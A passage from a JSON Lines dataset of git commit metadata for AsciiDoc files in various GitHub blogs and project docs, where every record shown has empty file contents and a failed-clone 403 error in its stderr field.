'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63e976d0734039da6365fdc225f4bd29e860c867","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 
2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b99eef6f4c925ef51bc81232f4e45f052d3873","subject":"more minor tweaks to workshop abstracts","message":"more minor tweaks to workshop abstracts\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f386598a2d1a0609488877c5183a533fe6b826f","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"010affdd39e7efdbb7ea5ce75831564a583e9792","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d4e150700624b80ebaea29e6f6fbd0081769aa9","subject":"Update 2017-07-26-Open-Pages-New-Workspace-Setup.adoc","message":"Update 2017-07-26-Open-Pages-New-Workspace-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-26-Open-Pages-New-Workspace-Setup.adoc","new_file":"_posts\/2017-07-26-Open-Pages-New-Workspace-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f331094f68cf2ce17abbebae153ce3ba926c14e","subject":"Update 2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","message":"Update 
2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","repos":"neomobil\/neomobil.github.io,neomobil\/neomobil.github.io,neomobil\/neomobil.github.io,neomobil\/neomobil.github.io","old_file":"_posts\/2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","new_file":"_posts\/2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neomobil\/neomobil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be246b8ceb304300b2148c95b3a3db78dbc148f","subject":"Update 2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","message":"Update 2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","new_file":"_posts\/2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dfa471c60dea62ba23f84c93e05919ffafe4438","subject":"anotehr small update1","message":"anotehr small update1\n","repos":"dproc\/trex_odp_porting_integration,dimagol\/trex-core,wofanli\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,kisel\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,dproc\/trex_odp_porting_integration,dimagol\/trex-core,kisel\/trex-core,wofanli\/trex-core,wofanli\/trex-core,kisel\/trex-core,wofanli\/trex-core,kisel\/trex-core,kisel\/trex-core,wofanli\/trex-core,dimagol\/trex-core,kisel\/trex-core,wofanli\/trex-core,dproc\/trex_odp_porting_integration,dproc\/trex_odp_porting_integration,dimagol\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"162c0bbc75d67dda8557364c2cb70acb84bb2252","subject":"trying to get gif working","message":"trying to get gif working\n","repos":"brechin\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,Applemann\/hypatia,brechin\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daa9d5b985f78d0fac7ecee0033c66994c76f8e3","subject":"Small edit","message":"Small 
edit\n","repos":"woorea\/vertx-web-site,vietj\/vertx,woorea\/vertx-web-site,cescoffier\/web-site,kevinbayes\/vertx-web-site,vietj\/vertx,michel-kraemer\/web-site,cescoffier\/web-site,karianna\/vertx-web-site,karianna\/vertx-web-site,michel-kraemer\/web-site,kevinbayes\/vertx-web-site,vert-x3\/vertx-web-site,karianna\/vertx-web-site,cescoffier\/web-site,cazacugmihai\/vertx-web-site,michel-kraemer\/web-site,vietj\/vertx,cazacugmihai\/vertx-web-site,vert-x3\/vertx-web-site,woorea\/vertx-web-site,kevinbayes\/vertx-web-site,cazacugmihai\/vertx-web-site,vert-x3\/vertx-web-site","old_file":"src\/main\/asciidoc\/manual.adoc","new_file":"src\/main\/asciidoc\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-web-site.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3ae7fad96a1f955a0079ace8064a7240317ac94","subject":"update","message":"update\n","repos":"jarodsun\/note_everything","old_file":"notes.adoc","new_file":"notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarodsun\/note_everything.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"b84701f46eaa8d27ce248ccb519c582595dad8e9","subject":"y2b create post Top 20 Futuristic + Sports Cars! (Detroit Auto Show 2014)","message":"y2b create post Top 20 Futuristic + Sports Cars! (Detroit Auto Show 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-27-Top-20-Futuristic--Sports-Cars-Detroit-Auto-Show-2014.adoc","new_file":"_posts\/2014-01-27-Top-20-Futuristic--Sports-Cars-Detroit-Auto-Show-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cfa2b90b2c0e32f047c6b092d76ea7777f283c5","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be4f1161b54b0cc8aac2e1e5b06d9fa6cce624b1","subject":"Publish 2016-6-29-PHP-CSV.adoc","message":"Publish 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHP-CSV.adoc","new_file":"2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4576f157db6f3b61d253dc9d35a34f01bc67ead3","subject":"Update 
2016-07-29-kanban.adoc","message":"Update 2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"732825b38e14e7e25e3ffedac5399855641390ce","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/json-schema-generator-maven-plugin,koh-osug\/json-schema-generator-maven-plugin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koh-osug\/json-schema-generator-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fed4579a4002d588257707ebd520b88192376bbd","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00680ab1e659ee08ec825eaf95b4907ae86503a2","subject":"Added files via upload","message":"Added files via upload","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/MicroServiceCasualTalk.adoc","new_file":"_posts\/MicroServiceCasualTalk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16301e2acd9b37675dffbfa03847f0b00e0c34a7","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f8d29c872cf049a39d2665ad85cb67e225cecae","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 
2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"503df75f11e5405a4d5d3a34b0d21cb5682d5489","subject":"Updating Contributing doc","message":"Updating Contributing doc","repos":"appsuite\/oss-httpd-build,appsuite\/oss-httpd-build","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appsuite\/oss-httpd-build.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b39029367977c72d98ef53751dacbd5ec10b92c0","subject":"Update 2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","message":"Update 2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","new_file":"_posts\/2015-11-26-Episode-33-Zen-Interview-Retrospective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4fef1d7dff6b10e3f8af89f1c01538a2fca1443","subject":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","message":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_file":"_posts\/2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31b15ec09ffa3fb6a195371aafac77d06caf54b","subject":"y2b create post Note 5 Unboxing \\\/ To Note Or Not?","message":"y2b create post Note 5 Unboxing \\\/ To Note Or Not?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-21-Note-5-Unboxing--To-Note-Or-Not.adoc","new_file":"_posts\/2015-08-21-Note-5-Unboxing--To-Note-Or-Not.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5b001841364d7521c2adaab40213f54ed30e31","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 
2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a325216f19277d4191c97afee1c66f82d056f9dc","subject":"Add RELEASE.adoc","message":"Add RELEASE.adoc\n\nCloses gh-9627\n","repos":"jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,rwinch\/spring-security,djechelon\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,jgrandja\/spring-security","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25ba588fe835f36d7f8d04e58bc091c10dead4fc","subject":"Update 2015-10-22-.adoc","message":"Update 2015-10-22-.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-22-.adoc","new_file":"_posts\/2015-10-22-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b6f72b786c0c9cce84de41344c5338f7c723fd4","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b86dec0bc194439f3c0c3e3faf3050e87f916b4","subject":"Update 2016-08-09.adoc","message":"Update 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09.adoc","new_file":"_posts\/2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15224693346d7a0caffd4396760b681cb21c4d9f","subject":"Faster Compilation\/Runtime and Spec Caching Fixes","message":"Faster Compilation\/Runtime and Spec Caching 
Fixes\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-06-26-faster-compilation-runtime-and-spec-caching-fixes.adoc","new_file":"content\/news\/2017-06-26-faster-compilation-runtime-and-spec-caching-fixes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"451f2a4c39ece8253a38c4f3fa5dcc17c0cd8aa1","subject":"Update 2015-07-22-Blog-Title.adoc","message":"Update 2015-07-22-Blog-Title.adoc","repos":"fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io,fr-developer\/fr-developer.github.io","old_file":"_posts\/2015-07-22-Blog-Title.adoc","new_file":"_posts\/2015-07-22-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fr-developer\/fr-developer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae8f10445c1ab3c2463a2b0f9fc51a890bc91246","subject":"Update 2015-09-15-Blog-Title.adoc","message":"Update 2015-09-15-Blog-Title.adoc","repos":"caglarsayin\/hubpress,caglarsayin\/hubpress,caglarsayin\/hubpress","old_file":"_posts\/2015-09-15-Blog-Title.adoc","new_file":"_posts\/2015-09-15-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caglarsayin\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6f2040cfac9c2142754915b5beea6ed209319a","subject":"Update 2016-04-07-2016-04-06.adoc","message":"Update 2016-04-07-2016-04-06.adoc","repos":"nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io,nichijo-chuka\/nichijo-chuka.github.io","old_file":"_posts\/2016-04-07-2016-04-06.adoc","new_file":"_posts\/2016-04-07-2016-04-06.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nichijo-chuka\/nichijo-chuka.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bdf98c89034d424f93222a47de2a7240f572116","subject":"Update bean validation article to use FW8 APIs (#10387)","message":"Update bean validation article to use FW8 APIs (#10387)\n\nSuggested by [Jean-Christophe Gueriaud](https:\/\/vaadin.com\/forum\/#!\/thread\/16876180).\n\nCloses #10386","repos":"mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework","old_file":"documentation\/articles\/UsingBeanValidationToValidateInput.asciidoc","new_file":"documentation\/articles\/UsingBeanValidationToValidateInput.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfc9406d5cc25b46188be5e4124af1835cdec2fe","subject":"first page on upcoming full documentation","message":"first page on upcoming full 
documentation\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/getting-started.asciidoc","new_file":"docs\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"9f5c59e2af99e3410a41c709d166a14f64746da4","subject":"High-level documentation","message":"High-level documentation","repos":"Enterprise-Content-Management\/infoarchive-sip-sdk,kovaloid\/infoarchive-sip-sdk","old_file":"yaml\/README.adoc","new_file":"yaml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Enterprise-Content-Management\/infoarchive-sip-sdk.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"0b250e073c88509128086c83ddaba457a4c8e3db","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c55170537e70ddc0c437295ba29e685109a4149","subject":"y2b create post 5 Cool Gadgets Under $10","message":"y2b create post 5 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-07-5-Cool-Gadgets-Under-10.adoc","new_file":"_posts\/2017-05-07-5-Cool-Gadgets-Under-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4381c62504fb0bf207720f6e51f26478d4b53a3e","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a326dd5988d5d0c42d83df96abc4948795ac5994","subject":"Update 2016-01-11-new.adoc","message":"Update 2016-01-11-new.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-11-new.adoc","new_file":"_posts\/2016-01-11-new.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3161e64a904f04c11fff741bdf2fd389c617ff65","subject":"Update 2016-07-20-vim.adoc","message":"Update 
2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5f0b176122d133e6a37db6cb0589e783f56f8b0","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce220363ec3ec9fc3e0e49d7c5bb439f4aca1b3","subject":"Update 2015-08-06-TO-DELETE.adoc","message":"Update 2015-08-06-TO-DELETE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-TO-DELETE.adoc","new_file":"_posts\/2015-08-06-TO-DELETE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80fb3552cd448cb3eeb7bb25cd0a881752435760","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"466b2240a27de304d4858a7365cb399575c58982","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 